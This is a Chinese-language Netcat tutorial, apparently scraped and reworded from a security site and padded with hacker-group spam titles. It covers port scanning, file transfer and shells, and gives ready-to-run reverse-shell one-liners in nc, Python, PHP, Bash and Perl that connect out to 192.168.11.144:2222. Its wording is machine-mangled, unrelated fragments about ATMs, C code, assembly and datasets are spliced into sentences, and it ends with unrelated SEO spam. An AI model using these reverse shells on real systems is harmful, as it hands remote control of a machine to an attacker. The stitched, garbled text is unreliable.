最近在做浸透检验的时分遇到了端口监听和shell的反弹问题,在这个进程中自己对Netcat这一款神器有了新的知道,现将一些Netcat的用法做一个小总结,期望对各位有协助!
Netcat简介Netcat是一款十分知名的 *** 工具,简称“NC”,有浸透检验中的“瑞士军刀”之称。它可以用作端口监听、端口扫描、长途文件传输、还可以完成长途shell等功用。总归功用强壮,可以用一句较为幽默的话来描述NC的强壮——“你的想象力是限制NC的瓶颈”。
Netcat选项参数阐明
功用阐明:端口扫描、端口监听、长途文件传输、长途shell等等;
语 法:nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<推迟秒数>][-o<输出文件>][-p<通讯端口>][-s<来历位址>][-v...][-w<超时秒数>][主机称号][通讯端口...]
参 数:
-g <网关> 设置路由器跃程通讯网关,最多可设置8个;
-G <指向器数目> 设置来历路由指向器,其数值为4的倍数;
-h 在线协助;
-i <推迟秒数> 设置时刻距离,以便传送信息及扫描通讯端口;
-l 运用监听方式,管控传入的材料;
-n 直接运用IP地址,而不通过域名服务器;
-o <输出文件> 指定文件称号,把来往传输的数据以16进制字码倾倒成该文件保存;
-p <通讯端口> 设置本地主机运用的通讯端口;
-r 乱数指定本地与远端主机的通讯端口;
-s <来历位址> 设置本地主机送出数据包的IP地址;
-u 运用UDP传输协议;
-v 显现指令实行进程;
-w <超时秒数> 设置等候连线的时刻;
-z 运用0输入/输出方式,只在扫描通讯端口时运用。
Netcat简易运用衔接到长途主机
指令:nc -nvv Targert_IP Targert_Port
监听本地主机
指令:nc -l -p Local_Port
端口扫描
扫描指定主机的单一端口是否敞开
格局:nc -v target_IP target_Port
 
这儿也需求留心几个问题:
;扫描指定主机的某个端口段的端口敞开信息
格局:nc -v -z Target_IP Target_Port_Start - Target_Port_End
扫描指定主机的某个UDP端口段,而且回来端口信息
格局:nc -v -z -u Target_IP Target_Port_Start - Target_Port_End
扫描指定主机的端口段信息,而且设置超时时刻为3秒
格局:nc -vv(-v) -z -w time Target_IP Target_Port_Start-Targert_Port_End
端口监听
监听本地端口
格局:nc -l -p local_Port
注:先设置监听(不能呈现端口抵触),之后假设有外来访问则输出该详细信息到指令行
监听本地端口,而且将监听到的信息保存到指定的文件中
格局:nc -l -p local_Port > target_File
衔接长途系统
格局:nc Target_IP Target_Port
之后可以工作HTTP恳求
FTP匿名勘探
格局:nc Targert_IP 21
文件传输
传输端:
格局:nc Targert_IP Targert_Port < Targert_File
接纳端:
格局:nc -l Local_Port > Targert_File
本地主机
指令:nc -l 8888
长途主机
指令:nc Targert_IP Targert_Port
蜜罐作为蜜罐运用1:
指令:nc -L -p Port
注:运用“-L”参数可以不断的监听某一个端口,知道Ctrl+C停止
作为蜜罐运用2:
指令:nc -L -p Port >log.txt
注:运用“-L”参数可以不断的监听某一个端口,知道Ctrl+C停止,一同把成果输出到log.txt文件中,假设把“>”改为“>>”即追加到文件之后。
这一个指令参数“-L”在Windows中有,现在的Linux中是没有这个选项的,可是自己可以去找找,这儿仅仅想到了之前的这个运用,所以提出来简略介绍一下!
获取shell简述:获取shell分为两种,一种是正向shell,一种是方向shell。假设客户端衔接服务器端,想要获取服务器端的shell,那么称为正向shell,假设是客户端衔接服务器,服务器端想要获取客户端的shell,那么称为反向shell
正向shell
本地主机:
指令:nc Targert_IP Targert_Por针对一个数据集的特征构建有许多 *** ,所得的特征也各有不同。今天出于实验的考虑,我们用两种 *** 来构建特征。t
方针主机:
指令:nc -lvp Targert_Port -e /bin/sh
反向shell本地主机:
指令: nc -lvp Target_Port
方针主机:
指令: nc Targert_IP Targert_Port -e /bin/sh
特殊情况——方针主机上没有Netcat,怎样获取反向shell在一般情况下,方针主机上一般都是不会有Netcat的,此刻就需要运用其他代替的 *** 来完成反向链接到达进犯主机的意图,下面简略的介绍几种反向shell的设置。
python反向shell
方针主机端实行句子:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.144",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
本地主机
方针主机
PHP反向shell
方针主机端实行句子:
php -r '$sock=fsockopen("192.168.11.144",2222);exec("/bin/sh -i <&3 >&3 2>&3");'
本地主机:
方针主机:
Bash反向shell
方针主机端实行句子:
bash -i>&/dev/tcp/192.168.11.144/2222 0>&1
本地主机:
方针主机:
Perl反向shell
方针主机端实行句子:
perl -e 'use Socket;$i="192.168.11.144";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
本地主机
方针主机
注:书写的时分必定要注意这儿单引号、双引号是英文格局的,否则会报过错!
总结:有一句话为“温故而知新”,一同又有一句话为“实践出真知”,当这两句话一同饯别的时分,就会擦出不一样的火花,你会看到你之前未见到的,把握到你之前陌生的技术!Netcat当然查询的厂商列表如下:好用,可是也要通过实践才知道,那你还在等什么呢?
*本文作者:Fly前途似锦,转载请注明来自 FreeBuf.COM
黑客 *** 群:“瑞士军刀”Netcat使用 *** 总结
*/#define _GNU_SOURCE补偿:“瑞士军刀”Netcat使用 *** 总结
黑客 *** 群怎样工作插件ATM包括两个首要的部分:cabinet和safe。Cabinet也就是ATM的主体部分包括ATM计算机,这是与 *** 设备、读卡器、键盘、现金出口等设备相连的。Safe部分是由钢筋做成的,含有吐钞口和钞票进口等模块。计算机一般工作的都是Windows系统,不过是一种专门为ATM所规划的嵌入式版别。只需管理员或许访问Windows系统,其他用户是不能访问的。所以用户看到的运用是工作在kiosk方式下的。 false先去找到user32.IsMenu ***
root soft nofile 100000工作完我们继续触发溃散。Arbitrary Code Guard(任意代码关照卫士)黑客 *** 群
tp_sizeof_priv int32
例如 bcrypt 算法就运用了类似思想,它在核算进程中一再访问 4KB 的内存空间,然后消耗带宽资源。
[1][2]黑客接单网
我们来试试将frida注入父进程。 “瑞士军刀”Netcat使用 *** 总结黑客 *** 群图5Firefox40中用户禁用未签名的扩展2、运维堡垒机cknife:[项目地址],这把刀可以自定义各种通讯 *** 和php实行函数用于绕过waf检测。实践检验下来,的确许多家waf的默许战略对自定义方式阻挠无力。
密文和盐的更新与不可追溯#include "sodium.h"黑客 *** 群服务端+应战支撑和附和的特性。
微软的文件数字签名验证我们必定听说过。微软为系统的要害文件引入数字签名的机制,是为了维护系统的无缺性。因为操作系统的要害文件的无缺性十分重要,只需确保了它们的无缺和不被篡改,才华确保系统的安全和平稳工作。Windows 10系统就内置了文件签名验证的东西,可以很方便地检查系统文件的无缺性和安全性。一同,关于外来设备的程序和驱动,也可以检查。通过它可以找出系统中“不明身份”的文件。
{fonttbl{f0froman Tms Rmn;}{f1fdecor Symbol;}{f2fswiss Helv;}} "os",“瑞士军刀”Netcat使用 *** 总结MIKEY-SAKKE存在后门,可解密全部VoIP通讯mysql_query($sql) or die(mysql_error());096b0091 ba555593c5 mov edx,0C5935555h 假设因为网速太慢等原因我们只能进行时刻短更新,所以我们要保证先发送关于危险网站的信息,更新真的需求精密核算。我们还和Google的紧缩团队协作,把我们的数据尽或许的紧缩的越小越好,这样才华保证数据传输尽或许不给用户的运用构成影响。
本文标题:黑客 *** 群:“瑞士军刀”Netcat使用 *** 总结
觉得如今的双十一的标准一年比一年不便和繁杂,有些人表明为了更好地双十一买一个物品真的是太耗头脑了,我就而言说有关双十一标准太繁杂的心情短语吧。 双十一繁杂费头脑感叹 2020年双十一,物品没...
在山海镜花游戏中悬赏最小的金乌就是金乌十郎,不过不少小伙伴们都还不知道山海镜花悬赏最小的金乌分布在哪,那么下面小编就为大家带来山海镜花悬赏最小的金乌位置介绍,去看看吧。 山海镜花金乌十郎位置介绍...
王者荣耀体验服资格申请每天都可以了,如果今天没名额了0点蹲点申请就行。 地址:https://pvp.qq.com/cp/a20161115tyf/page1.shtml 资格获取...
atp红客家族是什么 ATP——腺嘌呤核苷三磷酸 核糖与碱基腺嘌呤脱水结合形成腺苷,腺苷再结合上三分子磷酸基团就形成了三磷酸腺苷,英文简写为ATP。一种不稳定的高能化合物,生物体内最直接的能量来源。简...
人为什么会出现幻觉(常见幻觉的四种类型)幻觉是一种虚幻的知觉,它是指在没有客观刺激的条件下产生的知觉体验。也就是说幻觉一种主观体验,是常见的知觉障碍和精神症状。幻觉与错觉不同,幻觉有客观刺激的存在,其...
1 12月17日,正午阳光出品年度大剧《大江大河2》发布“时代”版片花,宣布将于12月20日正式开播。王凯饰演的宋运辉在《大江2》里将开启职业生涯新篇章,同时片...